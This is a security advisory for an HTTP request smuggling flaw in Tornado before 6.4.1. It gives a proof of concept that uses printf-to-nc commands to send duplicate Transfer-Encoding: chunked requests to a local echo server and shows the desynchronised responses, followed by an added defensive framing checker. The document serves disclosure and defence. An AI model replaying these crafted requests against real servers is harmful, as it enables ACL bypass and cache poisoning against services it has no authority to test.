HTTP Request Smuggling Affecting tornado package, versions [,6.4.1)


Severity: medium

CVSS assessment made by Snyk's Security Team.

Threat Intelligence

Exploit Maturity
Proof of concept

  • Snyk ID: SNYK-PYTHON-TORNADO-7217829
  • published: 7 Jun 2024
  • disclosed: 6 Jun 2024
  • credit: Unknown

Introduced: 6 Jun 2024

CVE: not available. CWE-444

How to fix?

Upgrade tornado to version 6.4.1 or higher.

Overview

tornado is a Python web framework and asynchronous networking library, originally developed at FriendFeed.

Affected versions of this package are vulnerable to HTTP Request Smuggling due to the handling of multiple Transfer-Encoding: chunked headers. An attacker can desynchronize the connection and potentially bypass ACLs or poison caches by sending crafted requests with duplicate Transfer-Encoding: chunked headers.

PoC

Install Tornado

Start a simple Tornado server that echoes each received request's body:

cat << 'EOF' > server.py
import asyncio
import tornado.web


class MainHandler(tornado.web.RequestHandler):
    def post(self):
        # Echo the received request body back to the client
        self.write(self.request.body)


async def main():
    tornado.web.Application([(r"/", MainHandler)]).listen(8000)
    # Keep the event loop running until the process is killed
    await asyncio.Event().wait()


asyncio.run(main())
EOF
python3 server.py &

Send a valid chunked request:

printf 'POST / HTTP/1.1\r\nTransfer-Encoding: chunked\r\n\r\n1\r\nZ\r\n0\r\n\r\n' | nc localhost 8000

Observe that the response is as expected:

HTTP/1.1 200 OK
Server: TornadoServer/6.3.3
Content-Type: text/html; charset=UTF-8
Date: Sat, 07 Oct 2023 17:32:05 GMT
Content-Length: 1

Z

Send a request with two Transfer-Encoding: chunked headers:

printf 'POST / HTTP/1.1\r\nTransfer-Encoding: chunked\r\nTransfer-Encoding: chunked\r\n\r\n1\r\nZ\r\n0\r\n\r\n' | nc localhost 8000

Observe the strange response:

HTTP/1.1 200 OK
Server: TornadoServer/6.3.3
Content-Type: text/html; charset=UTF-8
Date: Sat, 07 Oct 2023 17:35:40 GMT
Content-Length: 0

HTTP/1.1 400 Bad Request
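The desync in the PoC comes from a request head whose body framing is ambiguous. The following added example (not Tornado's code and not part of the advisory) is a defender-side framing check that flags the ambiguities request smuggling depends on, run over constructed copies of the two PoC requests; it also covers the related Transfer-Encoding plus Content-Length case that the advisory does not show.

```python
"""Framing check for raw HTTP/1.1 request heads (added example, not Tornado code)."""
from typing import List, Tuple


def parse_head(raw: bytes) -> Tuple[str, List[Tuple[str, str]]]:
    """Split a raw request into its request line and lower-cased (name, value) pairs."""
    head, _, _body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    request_line, header_lines = lines[0], lines[1:]
    headers = []
    for line in header_lines:
        name, sep, value = line.partition(":")
        if not sep:
            raise ValueError(f"malformed header line: {line!r}")
        headers.append((name.strip().lower(), value.strip()))
    return request_line, headers


def framing_problems(raw: bytes) -> List[str]:
    """Return the framing ambiguities found in the request head (empty list = clean)."""
    _, headers = parse_head(raw)
    te_values = [v for n, v in headers if n == "transfer-encoding"]
    cl_values = [v for n, v in headers if n == "content-length"]
    problems = []
    if len(te_values) > 1:
        problems.append("duplicate Transfer-Encoding headers")
    if te_values and cl_values:
        problems.append("Transfer-Encoding combined with Content-Length")
    if len(set(cl_values)) > 1:
        problems.append("conflicting Content-Length values")
    if te_values:
        # A request may list several codings, but "chunked" must be last and unique.
        codings = [c.strip().lower() for v in te_values for c in v.split(",")]
        if codings[-1] != "chunked":
            problems.append("final transfer coding is not chunked")
        if codings.count("chunked") > 1:
            problems.append("chunked applied more than once")
    return problems


# Constructed sample requests mirroring the two PoC requests above.
VALID = b"POST / HTTP/1.1\r\nTransfer-Encoding: chunked\r\n\r\n1\r\nZ\r\n0\r\n\r\n"
DUPLICATE_TE = (b"POST / HTTP/1.1\r\nTransfer-Encoding: chunked\r\n"
                b"Transfer-Encoding: chunked\r\n\r\n1\r\nZ\r\n0\r\n\r\n")

if __name__ == "__main__":
    for label, req in (("valid", VALID), ("duplicate TE", DUPLICATE_TE)):
        print(label, "->", framing_problems(req) or ["ok"])
```

A front-end proxy or WAF rule that rejects any request with a non-empty result here closes the ambiguity before it reaches an unpatched Tornado.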
